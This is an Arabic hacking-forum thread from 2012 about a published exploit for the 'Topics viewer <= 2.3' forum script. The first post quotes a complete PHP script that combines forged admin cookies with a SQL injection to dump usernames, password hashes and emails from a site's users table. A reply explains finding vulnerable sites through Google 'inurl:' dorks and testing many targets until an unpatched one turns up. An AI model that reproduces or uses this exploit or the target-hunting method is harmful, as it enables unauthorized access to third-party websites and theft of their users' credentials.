يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة [استفسار] حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection
التسجيل التعليمات التقويم مشاركات اليوم البحث

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 07-05-2012, 09:12 AM   رقم المشاركة : 1
معلومات العضو
Abo MalaK
 
الصورة الرمزية Abo MalaK
 

 
 
إحصائية العضو







Abo MalaK غير متواجد حالياً

إرسال رسالة عبر MSN إلى Abo MalaK

 

 

إحصائية الترشيح

عدد النقاط : 10
Abo MalaK is on a distinguished road
مطلوب حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

السلام عليكم ورحمة الله وبركاته

المهم

حصلت ثغره جديده توها نزلت
http://pastebin.com/KqFCfyc3
فهمت تقريبآ 60%

اقتباس
<?

$host="http://www.el3drabyad.com/"; //ضع الموقع المصاب بدل هذا الموقع واستعرض الملف من المتصفح

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $host."/modcp/rmv_topic_pop.php?id=-1+/*!union*/+/*!SELeCT*/+1,group_concat(u_name,0x3a,u_mpass,0x3a,u_email), 3,4,5,6,7,8,9,10,11,12+/*!frOm*/+users--");

curl_setopt($ch, CURLOPT_******, "admin=ahwak2000;mod=ahwak2000;");

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

$buffer = curl_exec($ch);

if(strpos($buffer,"style.css"))
{

echo "<br> [-]---------------------------------------------[-]<br>";

$reg = '#<li .*>.*:(.*?)؟</span></li>#Us';

preg_match($reg,$buffer,$ahwak);

$s1=explode(",",$ahwak[1]);
$i=1;

foreach($s1 as $ayrik){

print "<br> <b>[$i] ".trim($ayrik)."</b><br>";

$i++;

}

echo "<br> [-]---------------------------------------------[-]<br><b><font color=red>z.u5@hotmail.com</font></b>";

}

?>

طيب هذا الاستغلال تمام،!!
الي مافهمته هل استعرضه بمتداد html>?
+
دوركت لها لاني حآولت بها ماقدرت
+
كيف اعرف هل الموقع مصاب بالثغره ام لا

بنتضآركم
التوقيع

استغفر الله العظيم
استغفر الله العظيم من كل فرض تركـــــتــه
استغفر الله العظيم من كل انسان ظلـمـتــــه
استغفر الله العظيم من كل صالح جـفــوتــــه
استغفر الله العظيم من كل ظالم صاحـــبتــه
استغفر الله العظيم من كل بـــر أجـــــلتـــــه
استغفر الله العظيم من كل ناصح أهنــتـــــه
++
دعوآتكم لي،

 

   

رد مع اقتباس
قديم 07-05-2012, 07:00 PM   رقم المشاركة : 2
معلومات العضو
mido868
 
الصورة الرمزية mido868
 

 
 
إحصائية العضو






mido868 غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى mido868

 

 

إحصائية الترشيح

عدد النقاط : 16
mido868 is on a distinguished road
افتراضي رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Abo MalaK
السلام عليكم ورحمة الله وبركاته

المهم

حصلت ثغره جديده توها نزلت
http://pastebin.com/KqFCfyc3
فهمت تقريبآ 60%


طيب هذا الاستغلال تمام،!!
الي مافهمته هل استعرضه بمتداد html>?
+
دوركت لها لاني حآولت بها ماقدرت
+
كيف اعرف هل الموقع مصاب بالثغره ام لا

بنتضآركم

اكيد اخى العزيز الموقع ينتهى مثل هذا
.php?id=

ثانيا الاسكربت المصاب الذى ستبحث عنه
/modcp/rmv_topic_pop.php?

ويمكنك ان تقوم بعمل التالى
inurl:
ثم تضع بعدها اسم الاسكربت المصاب فى محرك البحث جوجل ثم تبدأ بالاختبار على عدة مواقع
وملحوظة لا تيأس اذا وجدت عديد من المواقع تم ترقيع الثغرة منها واستمر فى المحاولة وتذكر دائما ان الصبر احد الاركان الاساسية للنجاح
التوقيع

علمتنى الحياة ألا اكون كالذين كتموا العلم فمات معهم
إذا عندك إقتراح وتريد تنفيذه (لو عندك اقتراح ،اكتبه هنا)
http://www.vbspiders.com/vb/t67563.html
AUHT

 

   

رد مع اقتباس
قديم 07-06-2012, 03:48 AM   رقم المشاركة : 3
معلومات العضو
Abo MalaK
 
الصورة الرمزية Abo MalaK
 

 
 
إحصائية العضو







Abo MalaK غير متواجد حالياً

إرسال رسالة عبر MSN إلى Abo MalaK

 

 

إحصائية الترشيح

عدد النقاط : 10
Abo MalaK is on a distinguished road
افتراضي رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

شآكر لتفاعلك ،

بس الدوركت مستحيل يكون

/modcp/rmv_topic_pop.php?

لآن ماطلع ولا موقع،

بعدين الاستغلال هل احفظ الثغره بصيغة html واستغل؟

التوقيع

استغفر الله العظيم
استغفر الله العظيم من كل فرض تركـــــتــه
استغفر الله العظيم من كل انسان ظلـمـتــــه
استغفر الله العظيم من كل صالح جـفــوتــــه
استغفر الله العظيم من كل ظالم صاحـــبتــه
استغفر الله العظيم من كل بـــر أجـــــلتـــــه
استغفر الله العظيم من كل ناصح أهنــتـــــه
++
دعوآتكم لي،

 

   

رد مع اقتباس
قديم 07-07-2012, 12:45 AM   رقم المشاركة : 4
معلومات العضو
Abo MalaK
 
الصورة الرمزية Abo MalaK
 

 
 
إحصائية العضو







Abo MalaK غير متواجد حالياً

إرسال رسالة عبر MSN إلى Abo MalaK

 

 

إحصائية الترشيح

عدد النقاط : 10
Abo MalaK is on a distinguished road
افتراضي رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

الآستغلال لحد الآن ماوصلت له،

هل اعدل على كود الثغره ام انفذ امر
php rmv_topic_pop.php site.com/path/

؟

التوقيع

استغفر الله العظيم
استغفر الله العظيم من كل فرض تركـــــتــه
استغفر الله العظيم من كل انسان ظلـمـتــــه
استغفر الله العظيم من كل صالح جـفــوتــــه
استغفر الله العظيم من كل ظالم صاحـــبتــه
استغفر الله العظيم من كل بـــر أجـــــلتـــــه
استغفر الله العظيم من كل ناصح أهنــتـــــه
++
دعوآتكم لي،

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
الانتقال السريع


الساعة الآن 12:54 AM

راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]